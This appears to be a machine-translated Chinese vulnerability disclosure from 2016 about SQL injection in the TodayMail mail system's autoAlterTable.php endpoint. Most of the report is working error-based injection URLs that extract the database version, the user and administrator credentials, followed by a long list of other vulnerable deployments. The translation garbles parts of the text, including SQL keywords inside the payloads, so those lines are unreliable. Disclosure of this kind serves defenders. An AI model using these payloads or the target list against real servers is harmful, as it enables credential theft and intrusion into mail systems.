漏洞标题 TodayMail邮件系统存在SQL注射漏洞 相关厂商 广东时代互联科技有限公司 漏洞作者 路人甲 提交时间 2016-03-30 14:13 公开时间 2016-06-28 17:20 漏…
漏洞标题
TodayMail邮件系统中存在SQL注入漏洞
相关制造商
广东时代互联网科技有限公司
漏洞作者
过路人
提交时间
2016-03-30 14: 13
公共时间
2016-06-28 17: 20
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
15
漏洞状态
制造商已确认
标签标签
安全意识不足,PHP源代码审查
漏洞详细信息
使用量不多,下面的链接有漏洞
/mailcontrol/autoAlterTable.php
直接使用该漏洞
/mailcontrol/autoAlterTable.php?baseServer=**.**.**.**&database=todaymail&tableName=todaymail%20where%20updatexml%281,concat%280x23,version%28%29%29,1% 29
官方网站演示
0x1http://**。**。**。**
http://**。**。**。**/mailcontrol/autoAlterTable.php?baseServer=**。**。**。**& database=todaymail& tableName=todaymail%20where%20updatexml%281,concat% 280x23,版本%28%29%29,1%29

0x2http://**。**。**。**
http://**。**。**。**/mailcontrol/autoAlterTable.php?baseServer=**。**。**。**& database=todaymail& tableName=todaymail%20where%20updatexml%281,concat% 280x23,用户%28%29%29,1%29

0x3http://**。**。**。**
http://**。**。**。**/mailcontrol/autoAlterTable.php?baseServer=**。**。**。**& database=todaymail& tableName=todaymail%20where%20updatexml%281,concat% 280x23,用户%28%29%29,1%29

获取管理员的帐户密码(官方网站演示)
http://**。**。**。**/mailcontrol/autoAlterTable.php?baseServer=**。**。**。**& database=todaymail& tableName=todaymail%20where%20updatexml%281,concat% 280x23,%28%28select%20concat%28tm_name,0×23,tm_domain,0×23,tm_passwd%29%20from%20todaymail%20limit%200,1%29%29%29,1%29

其他现有案例,非常多,给定部分
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
**。**。**。** /网络邮件/login.php中
漏洞证明:
获取管理员的帐户密码(官方网站演示)
http://**。**。**。**/mailcontrol/autoAlterTable.php?baseServer=**。**。**。**& database=todaymail& tableName=todaymail%20where%20updatexml%281,concat% 280x23,%28%28select%20concat%28tm_name,0×23,tm_domain,0×23,tm_passwd%29%20from%20todaymail%20limit%200,1%29%29%29,1%29

修理计划:
过滤
版权声明:请注明出处。居民A @乌云